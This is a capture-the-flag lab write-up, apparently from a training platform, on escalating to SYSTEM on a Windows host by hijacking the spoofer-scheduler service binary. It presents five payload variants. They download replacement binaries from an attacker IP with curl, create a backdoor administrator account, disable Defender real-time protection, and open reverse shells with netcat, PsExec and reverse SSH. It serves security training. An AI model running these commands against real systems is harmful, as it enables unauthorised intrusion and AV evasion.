Service Hijacking
It has been identified that the current user, tyler
, is able to modify the service binary of the spoofer-scheduler
service and to restart the service the HACKSMARTERSEC
(10.10.183.209
) host. As the spoofer-scheduler
service is running as SYSTEM
, privilege escalation is achievable by hijacking the service binary and restarting the service.
The HACKSMARTERSEC
(10.10.183.209
) host has AV enabled and enforced.
Executing malicious PE file will be flagged and removed by AV.
Thus, the following 4 payloads were created;
MASM
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\tmp> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting the spoofer-scheduler
service.
PS C:\tmp> net user adm1n
User name adm1n
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/5/2025 5:31:10 PM
Password expires 8/16/2025 5:31:10 PM
Password changeable 7/5/2025 5:31:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
It executed the payload and a local administrator user was created.
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
System level compromise.
Nim-Reverse-Shell
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/Nim-Reverse-Shell/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\tmp> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
Restarting the spoofer-scheduler
service.
System level compromise.
C
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting the spoofer-scheduler
service.
PS C:\> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
tyler
The command completed successfully.
The current user, tyler
, is now part of the Administrators
group.
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; Set-MpPreference -DisableScr
iptScanning 1
Disabling AV
PS C:\> curl http://10.9.0.130/nc64.exe -OutFile C:\tmp\nc64.exe
PS C:\> curl http://10.9.0.130/PsExec64.exe -OutFile C:\tmp\PsExec64.exe
PS C:\> C:\tmp\PsExec64.exe -accepteula -i -s cmd.exe /c "C:\tmp\nc64.exe 10.9.0.130 1234 -e cmd"
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
Sending a reverse shell via PsExec.exe
System level compromise.
update_script
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130/update_script/spoofer-scheduler.exe -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Restarting the spoofer-scheduler
service.
Stager fetched
System level compromise.
reverse_ssh
simply best one. yet. overkill.
PS C:\> mv "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe" "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe.bak"
PS C:\> curl http://10.9.0.130:3232/f34c0affc1580f49c4fc6f5c6217096d -OutFile "C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe"
Hijacking the service binary with the payload.
Fetched from the RSSH server on Kali
PS C:\> sc.exe stop spoofer-scheduler ; sc.exe start spoofer-scheduler
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x0
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2668
FLAGS :
Restarting the spoofer-scheduler
service.
Inbound SSH connection to the RSSH server on Kali.
catcher$ ls -t
Targets
+------------------------------------------+--------+--------------------------------------+
| IDs | Owners | Version |
+------------------------------------------+--------+--------------------------------------+
| b805d060a335eac6249674b8c75e98195764f25b | public | SSH-v2.6.18-2-gd042bc4-windows_amd64 |
| da97814cf2d2bc531f198600080929ed2ef6909a | | |
| workgroup.hacksmartersec..hacksmartersec | | |
| 10.10.90.93:49751 | | |
+------------------------------------------+--------+--------------------------------------+
The RSSH server on Kali now shows an agent Those IDs are all aliases for a single agent.
┌──(kali㉿kali)-[~]
└─$ ssh -J localhost:3232 workgroup.hacksmartersec..hacksmartersec
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
The authenticity of host 'workgroup.hacksmartersec..hacksmartersec (<no hostip for proxy command>)' can't be established.
ED25519 key fingerprint is SHA256:NRut4OK6SEMyAuOYUuzTIs0c0Hvrq1ooAXb0sbLlAFY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:291: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'workgroup.hacksmartersec..hacksmartersec' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Connecting..
catcher$ connect workgroup.hacksmartersec..hacksmartersec
Or like this
System level compromise.